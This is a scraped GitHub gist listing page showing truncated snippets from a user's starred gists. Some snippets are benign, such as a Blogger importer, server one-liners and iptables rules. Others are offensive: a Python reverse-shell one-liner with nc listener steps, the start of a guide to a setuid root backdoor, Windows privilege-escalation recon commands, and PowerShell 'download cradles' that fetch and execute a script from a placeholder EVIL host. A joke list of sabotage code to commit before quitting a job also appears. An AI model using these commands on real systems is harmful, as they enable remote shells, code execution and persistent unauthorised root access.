Skip to content

Instantly share code, notes, and snippets.

View g0tmi1k's full-sized avatar

g0tmi1k g0tmi1k

3.2k followers · 9 following
View GitHub Profile
@juniorz
juniorz / import.rb
Created January 5, 2012 10:15 — forked from ngauthier/import.rb
Import a blogger archive to jekyll (octopress version)
require 'rubygems'
require 'nokogiri'
require 'fileutils'
require 'date'
require 'uri'
# usage: ruby import.rb my-blog.xml
# my-blog.xml is a file from Settings -> Basic -> Export in blogger.
data = File.read ARGV[0]
@brandonb927
brandonb927 / osx-for-hackers.sh
Last active July 24, 2024 15:28
OSX for Hackers: Yosemite/El Capitan Edition. This script tries not to be *too* opinionated and any major changes to your system require a prompt. You've been warned.
#!/bin/sh
###
# SOME COMMANDS WILL NOT WORK ON macOS (Sierra or newer)
# For Sierra or newer, see https://github.com/mathiasbynens/dotfiles/blob/master/.macos
###
# Alot of these configs have been taken from the various places
# on the web, most from here
# https://github.com/mathiasbynens/dotfiles/blob/5b3c8418ed42d93af2e647dc9d122f25cc034871/.osx
@willurd
willurd / web-servers.md
Last active July 23, 2024 17:12
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@aras-p
aras-p / preprocessor_fun.h
Last active July 16, 2024 02:50
Things to commit just before leaving your job
// Just before switching jobs:
// Add one of these.
// Preferably into the same commit where you do a large merge.
//
// This started as a tweet with a joke of "C++ pro-tip: #define private public",
// and then it quickly escalated into more and more evil suggestions.
// I've tried to capture interesting suggestions here.
//
// Contributors: @r2d2rigo, @joeldevahl, @msinilo, @_Humus_,
// @YuriyODonnell, @rygorous, @cmuratori, @mike_acton, @grumpygiant,
@dergachev
dergachev / poor-mans-ssh.sh
Last active June 11, 2023 18:05
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# on the CLIENT, run the following:
# nc -l 12345
# on the SERVER, start the "reverse shell"
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345
# now go to the CLIENT, listen on port 12345 for incoming shell connections
nc -l 12345
@dergachev
dergachev / setuid-root-backdoor.md
Last active May 24, 2024 13:43
How to use setuid to install a root backdoor.

Why You Can't Un-Root a Compromised Machine

Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.

While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account from the system (including www-data, which you might not even know if compromised).

If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur

@sckalath
sckalath / windows_privesc
Last active June 4, 2024 07:55
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
@warewolf
warewolf / iptables.txt
Last active February 8, 2022 16:52
iptables based rate limiting
-A INPUT -i eth0 -p udp -m udp --dport 5060 -j SIP
#
-A SIP -i eth0 -p udp -m udp --dport 5060 -m string --string "INVITE" --algo bm --from 23 --to 28 -m comment --comment "Catch SIP INVITEs" -j SIPINVITE
-A SIP -i eth0 -p udp -m udp --dport 5060 -m string --string "REGISTER" --algo bm --from 23 --to 30 -m comment --comment "Catch SIP REGISTERs" -j SIPREGISTER
-A SIP -m comment --comment "Catch and accept everything else" -j ACCEPT
#
-A SIPINVITE -m hashlimit --hashlimit-upto 4/min --hashlimit-burst 4 --hashlimit-mode srcip,dstip,dstport --hashlimit-name anon-sip-rateinv --hashlimit-srcmask 24 -m comment --comment "Rate limit SIP invites" -j ACCEPT
-A SIPINVITE -m limit --limit 10/min -j LOG --log-prefix "SIPINV DROP: "
-A SIPINVITE -m comment --comment "Rate limit exceeded, reject" -j REJECT
#
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active July 18, 2024 03:59
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@glaslos
glaslos / demo_web_honeypot.py
Last active March 23, 2016 23:38
demo_web_honeypot
import SimpleHTTPServer
import SocketServer
paths = set()
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# Detect remote file inclusion
if '=http' in self.path: